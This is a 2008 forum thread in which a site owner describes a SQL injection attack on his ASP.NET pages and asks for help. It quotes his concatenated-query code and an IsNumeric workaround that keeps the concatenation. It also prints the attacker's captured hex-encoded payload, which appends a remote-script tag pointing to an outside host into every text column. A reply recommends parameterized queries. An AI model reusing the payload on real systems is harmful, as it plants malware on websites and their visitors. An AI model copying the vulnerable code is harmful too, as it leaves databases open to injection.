473,698 Members | 2,393 Online
Bytes | Software Development & Data Engineering Community
+ Post

Home Posts Topics Members FAQ

sql injection problem

I have a site that is made up of sevearl aspx pages. It was recently
attacked by sql injection. I downloaded the tool described here:
http://support.microsoft.com/kb/954476 but can't seem to run it correctly.
All the examples are for asp pages, not aspx pages. I tried to find a
similar tool for aspx with no luck. When I run the tool on one of my aspx
pages I get errors, not sql injection problems.

Here's an example from the readme.html file for the tool:

msscasi_asp.exe /input="c:\sourc e\logon.asp" /output="warning s.xml"

Here's one of the warnigns I get:

** msscasi_asp: Parse warning at C:\Inetpub\wwwr oot\MySite\logo n.aspx (line
2, column 94): Ignoring unexpected settings directive. Settings directive
must be unique and must be placed at the beginning of the file.

And there's nothing in my output file. It looks like this:

<?xml version="1.0" encoding="UTF-8"?>
<DEFECTS>
</DEFECTS>
<!--SEQ:0000000000-->

What do I do to run this on my aspx pages?

Can anyone help me out here? If I'm in the wrong newsgroup for this, please
tell me where I should post instead.

Thanks,

Keith
Aug 12 '08 #1
2 1917
By teh way, I took a look at the page where this happened and realized what
they did. Here's what I used to have:

Protected Sub Page_Load(ByVal sender As Object, ByVal e As
System.EventArg s) Handles Me.Load
If Not Page.IsPostBack Then
If Request.QuerySt ring("Classmate ID") <"" Then
dsClassmates.Se lectCommand = "SELECT * FROM
[Reunion].[vwClassmates_Ap proved_ForSite] WHERE ClassmateID = " &
Request.QuerySt ring("Classmate ID")
dsClassmates.Da taBind()
End If
End If
End Sub
Here's what I chagned it to (the line that tests for IsNumeric is new):

Protected Sub Page_Load(ByVal sender As Object, ByVal e As
System.EventArg s) Handles Me.Load
If Not Page.IsPostBack Then
If Request.QuerySt ring("Classmate ID") <"" Then
If IsNumeric(Reque st.QueryString( "ClassmateI D")) And
(Len(Request.Qu eryString("Clas smateID").ToStr ing) < 6) Then
dsClassmates.Se lectCommand = "SELECT * FROM
[Reunion].[vwClassmates_Ap proved_ForSite] WHERE ClassmateID = " &
Request.QuerySt ring("Classmate ID")
dsClassmates.Da taBind()
End If
End If
End If
End Sub

I'm thinking that solves my problem in this spot. Does that make sense? This
is what the hacker did:

ClassmateID=616 ;DECLARE%20@S%2 0VARCHAR(4000); SET%20@S=CAST(0 x4445434C415245 2
040542056415243 484152283235352 92C404320564152 434841522832353 529204445434C41 5
245205461626C65 5F437572736F722 0435552534F5220 464F522053454C4 5435420612E6E61 6
D652C622E6E616D 652046524F4D207 379736F626A6563 747320612C73797 3636F6C756D6E73 2
062205748455245 20612E69643D622 E696420414E4420 612E78747970653 D27752720414E44 2
028622E78747970 653D3939204F522 0622E7874797065 3D3335204F52206 22E78747970653D 3
23331204F522062 2E78747970653D3 1363729204F5045 4E205461626C655 F437572736F7220 4
645544348204E45 58542046524F4D2 05461626C655F43 7572736F7220494 E544F2040542C40 4
3205748494C4528 404046455443485 F5354415455533D 302920424547494 E20455845432827 5
55044415445205B 272B40542B275D2 0534554205B272B 40432B275D3D525 452494D28434F4E 5
645525428564152 434841522834303 030292C5B272B40 432B275D29292B2 7273C7363726970 7
4207372633D6874 74703A2F2F77777 72E706F72762E72 752F6A732E6A733 E3C2F7363726970 7
43E272727292046 45544348204E455 8542046524F4D20 5461626C655F437 572736F7220494E 5
44F2040542C4043 20454E4420434C4 F5345205461626C 655F437572736F7 2204445414C4C4F 4
341544520546162 6C655F437572736 F7220%20AS%20VA RCHAR(4000));EX EC(@S);

So it seems to me if I test for numeric and limit the lenght of the query
string I should be covered.

Any comments?
(still wondering about the MS injection analyzer too also)

Thanks,

Keith

"Keith G Hicks" <kr*@comcast.ne twrote in message
news:#k******** ******@TK2MSFTN GP02.phx.gbl...
I have a site that is made up of sevearl aspx pages. It was recently
attacked by sql injection. I downloaded the tool described here:
http://support.microsoft.com/kb/954476 but can't seem to run it correctly.
All the examples are for asp pages, not aspx pages. I tried to find a
similar tool for aspx with no luck. When I run the tool on one of my aspx
pages I get errors, not sql injection problems.

Here's an example from the readme.html file for the tool:

msscasi_asp.exe /input="c:\sourc e\logon.asp" /output="warning s.xml"

Here's one of the warnigns I get:

** msscasi_asp: Parse warning at C:\Inetpub\wwwr oot\MySite\logo n.aspx
(line
2, column 94): Ignoring unexpected settings directive. Settings directive
must be unique and must be placed at the beginning of the file.

And there's nothing in my output file. It looks like this:

<?xml version="1.0" encoding="UTF-8"?>
<DEFECTS>
</DEFECTS>
<!--SEQ:0000000000-->

What do I do to run this on my aspx pages?

Can anyone help me out here? If I'm in the wrong newsgroup for this,
please
tell me where I should post instead.

Thanks,

Keith



Aug 12 '08 #2
Keith G Hicks wrote:
By teh way, I took a look at the page where this happened and realized what
they did. Here's what I used to have:

Protected Sub Page_Load(ByVal sender As Object, ByVal e As
System.EventArg s) Handles Me.Load
If Not Page.IsPostBack Then
If Request.QuerySt ring("Classmate ID") <"" Then
dsClassmates.Se lectCommand = "SELECT * FROM
[Reunion].[vwClassmates_Ap proved_ForSite] WHERE ClassmateID = " &
Request.QuerySt ring("Classmate ID")
dsClassmates.Da taBind()
End If
End If
End Sub
Here's what I chagned it to (the line that tests for IsNumeric is new):

Protected Sub Page_Load(ByVal sender As Object, ByVal e As
System.EventArg s) Handles Me.Load
If Not Page.IsPostBack Then
If Request.QuerySt ring("Classmate ID") <"" Then
If IsNumeric(Reque st.QueryString( "ClassmateI D")) And
(Len(Request.Qu eryString("Clas smateID").ToStr ing) < 6) Then
dsClassmates.Se lectCommand = "SELECT * FROM
[Reunion].[vwClassmates_Ap proved_ForSite] WHERE ClassmateID = " &
Request.QuerySt ring("Classmate ID")
dsClassmates.Da taBind()
End If
End If
End If
End Sub

I'm thinking that solves my problem in this spot. Does that make sense? This
is what the hacker did:

ClassmateID=616 ;DECLARE%20@S%2 0VARCHAR(4000); SET%20@S=CAST(0 x4445434C415245 2
040542056415243 484152283235352 92C404320564152 434841522832353 529204445434C41 5
245205461626C65 5F437572736F722 0435552534F5220 464F522053454C4 5435420612E6E61 6
D652C622E6E616D 652046524F4D207 379736F626A6563 747320612C73797 3636F6C756D6E73 2
062205748455245 20612E69643D622 E696420414E4420 612E78747970653 D27752720414E44 2
028622E78747970 653D3939204F522 0622E7874797065 3D3335204F52206 22E78747970653D 3
23331204F522062 2E78747970653D3 1363729204F5045 4E205461626C655 F437572736F7220 4
645544348204E45 58542046524F4D2 05461626C655F43 7572736F7220494 E544F2040542C40 4
3205748494C4528 404046455443485 F5354415455533D 302920424547494 E20455845432827 5
55044415445205B 272B40542B275D2 0534554205B272B 40432B275D3D525 452494D28434F4E 5
645525428564152 434841522834303 030292C5B272B40 432B275D29292B2 7273C7363726970 7
4207372633D6874 74703A2F2F77777 72E706F72762E72 752F6A732E6A733 E3C2F7363726970 7
43E272727292046 45544348204E455 8542046524F4D20 5461626C655F437 572736F7220494E 5
44F2040542C4043 20454E4420434C4 F5345205461626C 655F437572736F7 2204445414C4C4F 4
341544520546162 6C655F437572736 F7220%20AS%20VA RCHAR(4000));EX EC(@S);

So it seems to me if I test for numeric and limit the lenght of the query
string I should be covered.

Any comments?
(still wondering about the MS injection analyzer too also)

Thanks,

Keith

"Keith G Hicks" <kr*@comcast.ne twrote in message
news:#k******** ******@TK2MSFTN GP02.phx.gbl...
>I have a site that is made up of sevearl aspx pages. It was recently
attacked by sql injection. I downloaded the tool described here:
http://support.microsoft.com/kb/954476 but can't seem to run it correctly.
All the examples are for asp pages, not aspx pages. I tried to find a
similar tool for aspx with no luck. When I run the tool on one of my aspx
pages I get errors, not sql injection problems.

Here's an example from the readme.html file for the tool:

msscasi_asp.ex e /input="c:\sourc e\logon.asp" /output="warning s.xml"

Here's one of the warnigns I get:

** msscasi_asp: Parse warning at C:\Inetpub\wwwr oot\MySite\logo n.aspx
(line
>2, column 94): Ignoring unexpected settings directive. Settings directive
must be unique and must be placed at the beginning of the file.

And there's nothing in my output file. It looks like this:

<?xml version="1.0" encoding="UTF-8"?>
<DEFECTS>
</DEFECTS>
<!--SEQ:0000000000-->

What do I do to run this on my aspx pages?

Can anyone help me out here? If I'm in the wrong newsgroup for this,
please
>tell me where I should post instead.

Thanks,

Keith



What you need to do is use SQLParameters to stop SQL injection. There
arer lots of articles on this (search Google). Basically what you would
do is have your where statment something like WHERE ClassmateID =
@ClassmateID. Then create a SqlParameter which would get populated from
the QueryString.

LS
Aug 12 '08 #3

This thread has been closed and replies have been disabled. Please start a new discussion.

Similar topics
1
2149
checking POST vars for SQL INJECTION
by: Cogswell | last post by:
I am working on an ecommerce app and want to be able to take my entire POST results as one item (or iterate through them) and check for any malicious SQL INJECTION items. After checking/escaping them i want to save them back into the post results. The reason for this is because I have coded the entire app and just learned about the dangers of SQL Injection and rather than going through every post var and fix it I would rather run a...
ASP / Active Server Pages
11
2628
SQL Injection - Stored Procedures
by: Bă§TăRĐ | last post by:
I have been working on this particular project for a little over 2 weeks now. This product contains between 700-900 stored procedures to handle just about all you can imagine within the product. I just personally rewrote/reformatted close to 150 of them myself. Nothing too fancy, mostly a lot of formatting. We have a little down time between Q/A and fixing any bugs they find so I decided to test the security of the site with Cross-Site...
ASP / Active Server Pages
5
2135
solution for preventing injection attacks
by: www.douglassdavis.com | last post by:
I have an idea for preventing sql injection attacks, however it would have to be implemented by the database vendor. Let me know if I am on the right track, this totally off base, or already implemented somewhere... Lets say you could have a format string such as in printf $format=" SELECT %s FROM %s WHERE id='%s' "; $fieldname="last_name"; $tablename="personel";
PHP
11
1955
Another form of SQL injection
by: howachen | last post by:
Hi, In many web articles, people focusing on SQL injection in the form of : e.g. /**********************************************************/ $name = "tom' UNION blah blah blah" $query = "SELECT * FROM users WHERE name = '".$name."'; /**********************************************************/
PHP
8
3792
Email injection on a contact form
by: stirrell | last post by:
Hello, One problem that I had been having is stopping email injections on contact forms. I did some research, read up on it and felt like I had created a working solution. I hadn't gotten any suspicious bouncebacks in quite some time and got many custom alerts I had set up for notifying me of injection attempts. However, just the other day, I got a bounceback from an AOL address which leads me to believe that an injection attempt was...
PHP
29
2112
IIS SQL Injection woes...
by: sinbuzz | last post by:
Hi, I'm curious about the best way to avoid SQL Injection attacks against my web server. Currently I'm on IIS. I might be willing to switch to something like Apache but I'm not sure if SQL Injection is is a generic enough of an attack to cause me worries once I make the
C# / C Sharp
7
2567
How can I create an innocuous SQL injection attempt to test apps and evaluate the result programmatically?
by: | last post by:
There are assorted "SQL Injection vulnerability assessment tools" out there. They scan your site and send your report. They also take your money. We don't have the money so I was wondering if I could replicate the tool's behavior myself. I am guessing that they work by attempting a non-destructive injection attack against your DB and evaluating the success or failure of that test. I am curious if a) I'm correct about this, and b) if...
ASP.NET
2
2223
question about validation and sql injection
by: Sudhakar | last post by:
A) validating username in php as part of a registration form a user fills there desired username and this is stored in a mysql. there are certain conditions for the username. a) the username should only begin either letters or numbers, and Underscore character example = user123, 123user, u_ser123, user_123 = completely case insensitive
PHP
12
640
sql injection
by: shank | last post by:
I've been hit again using DW, parameterized queries and stored procedures. I'm guessing I was not strict enough with character counts and allowing to long of a string to pass. Aside from that, as crude as it may be, is the below enough to stop these attacks? If not, how would they get around this? <% If Instr(Request.QueryString("http")) 1 or Instr(Request.QueryString("script")) 1 Then
ASP / Active Server Pages
0
8608
Changing the language in Windows 10
by: Hystou | last post by:
Most computers default to English, but sometimes we require a different language, especially when relocating. Forgot to request a specific language before your computer shipped? No problem! You can effortlessly switch the default language on Windows 10 without reinstalling. I'll walk you through it. First, let's disable language synchronization. With a Microsoft account, language settings sync across devices. To prevent any complications,...
Windows Server
0
9161
Oralloy
Problem With Comparison Operator <=> in G++
by: Oralloy | last post by:
Hello folks, I am unable to find appropriate documentation on the type promotion of bit-fields when using the generalised comparison operator "<=>". The problem is that using the GNU compilers, it seems that the internal comparison operator "<=>" tries to promote arguments from unsigned to signed. This is as boiled down as I can make it. Here is my compilation command: g++-12 -std=c++20 -Wnarrowing bit_field.cpp Here is the code in...
C / C++
1
8897
The easy way to turn off automatic updates for Windows 10/11
by: Hystou | last post by:
Overview: Windows 11 and 10 have less user interface control over operating system update behaviour than previous versions of Windows. In Windows 11 and 10, there is no way to turn off the Windows Update option using the Control Panel or Settings app; it automatically checks for updates and installs any it finds, whether you like it or not. For most users, this new feature is actually very convenient. If you want to control the update process,...
Windows Server
0
8867
tracyyun
Discussion: How does Zigbee compare with other wireless protocols in smart home applications?
by: tracyyun | last post by:
Dear forum friends, With the development of smart home technology, a variety of wireless communication protocols have appeared on the market, such as Zigbee, Z-Wave, Wi-Fi, Bluetooth, etc. Each protocol has its own unique characteristics and advantages, but as a user who is planning to build a smart home system, I am a bit confused by the choice of these technologies. I'm particularly interested in Zigbee because I've heard it does some...
General
0
7732
agi2029
AI Job Threat for Devs
by: agi2029 | last post by:
Let's talk about the concept of autonomous AI software engineers and no-code agents. These AIs are designed to manage the entire lifecycle of a software development project—planning, coding, testing, and deployment—without human intervention. Imagine an AI that can take a project description, break it down, write the code, debug it, and then launch it, all on its own.... Now, this would greatly impact the work of software developers. The idea...
Career Advice
1
6522
isladogs
Access Europe - Using VBA to create a class based on a table - Wed 1 May
by: isladogs | last post by:
The next Access Europe User Group meeting will be on Wednesday 1 May 2024 starting at 18:00 UK time (6PM UTC+1) and finishing by 19:30 (7.30PM). In this session, we are pleased to welcome a new presenter, Adolph Dupré who will be discussing some powerful techniques for using class modules. He will explain when you may want to use classes instead of User Defined Types (UDT). For example, to manage the data in unbound forms. Adolph will...
Microsoft Access / VBA
0
5860
Couldn’t get equations in html when convert word .docx file to html file in C#.
by: conductexam | last post by:
I have .net C# application in which I am extracting data from word file and save it in database particularly. To store word all data as it is I am converting the whole word file firstly in HTML and then checking html paragraph one by one. At the time of converting from word file to html my equations which are in the word document file was convert into image. Globals.ThisAddIn.Application.ActiveDocument.Select();...
C# / C Sharp
0
4619
Windows Forms - .Net 8.0
by: adsilva | last post by:
A Windows Forms form does not have the event Unload, like VB6. What one acts like?
Visual Basic .NET
1
3050
transfer the data from one system to another through ip address
by: 6302768590 | last post by:
Hai team i want code for transfer the data from one system to another through IP address by using C# our system has to for every 5mins then we have to update the data what the data is updated we have to send another system
C# / C Sharp

By using Bytes.com and it's services, you agree to our Privacy Policy and Terms of Use.

To disable or enable advertisements and analytics tracking please visit the manage ads & tracking page.

BYTES.COM © 2024
About Bytes
Terms Of Use
Privacy Policy
Sitemap
Advertise on Bytes
How to Post and Respond on Bytes
How to Promote and Link on Bytes
How to increase your Ranking on Bytes
Become a Recognized Expert on Bytes
Feedback Welcomed! Contact Us